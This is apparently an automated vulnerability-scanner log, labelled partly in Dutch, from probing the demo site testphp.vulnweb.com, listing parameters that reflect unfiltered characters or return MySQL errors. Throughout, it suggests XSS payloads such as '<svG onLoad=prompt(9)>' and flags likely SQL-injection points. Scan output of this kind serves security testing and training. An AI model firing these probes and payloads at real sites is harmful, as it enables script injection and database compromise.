[!] Mogelijke XSS-kwetsbaarheden op testphp.vulnweb.com:
---
[i] URL: http://testphp.vulnweb.com
[i] Response URL: http://testphp.vulnweb.com/search.php?test=query
[i] POST URL: http://testphp.vulnweb.com/search.php?test=query
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjem'"(){}<x>:/1zqjem;9
[+] Type: form
[+] Injectiepunten: searchFor
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <h2 id='pagename'>searched for: 1zqjem'"(){}<x>:/1zqjem;9

[i] URL: http://testphp.vulnweb.com/guestbook.php
[i] Response URL: http://testphp.vulnweb.com/guestbook.php
[i] POST URL: http://testphp.vulnweb.com/guestbook.php
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjam'"(){}<x>:/1zqjam;9
[+] Type: form
[+] Injectiepunten: text
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <img src="/images/remark.gif">&nbsp;&nbsp;1zqjam'"(){}<x>:/1zqjam;9

[i] URL: http://testphp.vulnweb.com/guestbook.php
[i] Response URL: http://testphp.vulnweb.com/guestbook.php
[i] POST URL: http://testphp.vulnweb.com/guestbook.php
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjam'"(){}<x>:/1zqjam;9
[+] Type: form
[+] Injectiepunten: name
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <strong>1zqjam'"(){}<x>:/1zqjam;9

[i] URL: http://testphp.vulnweb.com/login.php
[i] Response URL: http://testphp.vulnweb.com/userinfo.php
[i] POST URL: http://testphp.vulnweb.com/userinfo.php
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjzv'"(){}<x>:/1zqjzv;9
[+] Type: form
[+] Injectiepunten: pass
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/hpp/?pp=12
[i] Response URL: http://testphp.vulnweb.com/hpp/?pp=1zqjwq'%22()%7B%7D%3Cx%3E:/1zqjwq;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjwq'"(){}<x>:/1zqjwq;9
[+] Type: url
[+] Injectiepunten: pp
[+] Mogelijke payloads: x"/onmouseover=prompt(9)/", x"><svG onLoad=prompt(9)>, x" onmouseover=prompt(9) "
[i] Line: <a href="params.php?p=valid&pp=1zqjwq'"(){}<x>:/1zqjwq;9

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=4
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjmv'%22()%7B%7D%3Cx%3E:/1zqjmv;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjmv'"(){}<x>:/1zqjmv;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=4
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjmv'%22()%7B%7D%3Cx%3E:/1zqjmv;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjmv'"(){}<x>:/1zqjmv;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjmv;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=2
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjcq'%22()%7B%7D%3Cx%3E:/1zqjcq;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjcq'"(){}<x>:/1zqjcq;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=2
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjcq'%22()%7B%7D%3Cx%3E:/1zqjcq;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjcq'"(){}<x>:/1zqjcq;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjcq;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=12
[i] Response URL: http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=1zqjon'%22()%7B%7D%3Cx%3E:/1zqjon;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjon'"(){}<x>:/1zqjon;9
[+] Type: url
[+] Injectiepunten: pp
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <pvalid1zqjon'"(){}<x>:/1zqjon;9

[i] URL: http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=12
[i] Response URL: http://testphp.vulnweb.com/hpp/params.php?p=1zqjhx'%22()%7B%7D%3Cx%3E:/1zqjhx;9&pp=12
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjhx'"(){}<x>:/1zqjhx;9
[+] Type: url
[+] Injectiepunten: p
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p1zqjhx'"(){}<x>:/1zqjhx;9

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=1
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjth'%22()%7B%7D%3Cx%3E:/1zqjth;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjth'"(){}<x>:/1zqjth;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=1
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjth'%22()%7B%7D%3Cx%3E:/1zqjth;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjth'"(){}<x>:/1zqjth;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjth;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=2
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjae'%22()%7B%7D%3Cx%3E:/1zqjae;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjae'"(){}<x>:/1zqjae;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=2
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjae'%22()%7B%7D%3Cx%3E:/1zqjae;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjae'"(){}<x>:/1zqjae;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjae;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/product.php?pic=5
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjnj'%22()%7B%7D%3Cx%3E:/1zqjnj;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjnj'"(){}<x>:/1zqjnj;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/5.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjqh'%22()%7B%7D%3Cx%3E:/1zqjqh;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjqh'"(){}<x>:/1zqjqh;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjqh'"(){}<x>:/1zqjqh;9

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/7.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjbn'%22()%7B%7D%3Cx%3E:/1zqjbn;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjbn'"(){}<x>:/1zqjbn;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjbn'"(){}<x>:/1zqjbn;9

[i] URL: http://testphp.vulnweb.com/product.php?pic=4
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjvd'%22()%7B%7D%3Cx%3E:/1zqjvd;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjvd'"(){}<x>:/1zqjvd;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/product.php?pic=3
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjuj'%22()%7B%7D%3Cx%3E:/1zqjuj;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjuj'"(){}<x>:/1zqjuj;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/3.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjrg'%22()%7B%7D%3Cx%3E:/1zqjrg;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjrg'"(){}<x>:/1zqjrg;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjrg'"(){}<x>:/1zqjrg;9

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/4.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjyz'%22()%7B%7D%3Cx%3E:/1zqjyz;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjyz'"(){}<x>:/1zqjyz;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjyz'"(){}<x>:/1zqjyz;9

[i] URL: http://testphp.vulnweb.com/product.php?pic=7
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjxa'%22()%7B%7D%3Cx%3E:/1zqjxa;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjxa'"(){}<x>:/1zqjxa;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=3
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjde'%22()%7B%7D%3Cx%3E:/1zqjde;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjde'"(){}<x>:/1zqjde;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=3
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjde'%22()%7B%7D%3Cx%3E:/1zqjde;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjde'"(){}<x>:/1zqjde;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjde;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/artists.php?artist=2
[i] Response URL: http://testphp.vulnweb.com/artists.php?artist=1zqjho'%22()%7B%7D%3Cx%3E:/1zqjho;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjho'"(){}<x>:/1zqjho;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/artists.php?artist=1
[i] Response URL: http://testphp.vulnweb.com/artists.php?artist=1zqjna'%22()%7B%7D%3Cx%3E:/1zqjna;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjna'"(){}<x>:/1zqjna;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/artists.php?artist=3
[i] Response URL: http://testphp.vulnweb.com/artists.php?artist=1zqjip'%22()%7B%7D%3Cx%3E:/1zqjip;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjip'"(){}<x>:/1zqjip;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=1
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjnk'%22()%7B%7D%3Cx%3E:/1zqjnk;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjnk'"(){}<x>:/1zqjnk;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=1
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjnk'%22()%7B%7D%3Cx%3E:/1zqjnk;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjnk'"(){}<x>:/1zqjnk;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjnk;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/2.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjpv'%22()%7B%7D%3Cx%3E:/1zqjpv;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjpv'"(){}<x>:/1zqjpv;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjpv'"(){}<x>:/1zqjpv;9

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=3
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjtm'%22()%7B%7D%3Cx%3E:/1zqjtm;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjtm'"(){}<x>:/1zqjtm;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=3
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjtm'%22()%7B%7D%3Cx%3E:/1zqjtm;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjtm'"(){}<x>:/1zqjtm;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjtm;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/1.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjkd'%22()%7B%7D%3Cx%3E:/1zqjkd;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjkd'"(){}<x>:/1zqjkd;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjkd'"(){}<x>:/1zqjkd;9

[i] URL: http://testphp.vulnweb.com/product.php?pic=2
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjib'%22()%7B%7D%3Cx%3E:/1zqjib;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjib'"(){}<x>:/1zqjib;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/product.php?pic=1
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjhl'%22()%7B%7D%3Cx%3E:/1zqjhl;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjhl'"(){}<x>:/1zqjhl;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/6.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjms'%22()%7B%7D%3Cx%3E:/1zqjms;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjms'"(){}<x>:/1zqjms;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjms'"(){}<x>:/1zqjms;9

[i] URL: http://testphp.vulnweb.com/product.php?pic=6
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjei'%22()%7B%7D%3Cx%3E:/1zqjei;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjei'"(){}<x>:/1zqjei;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*
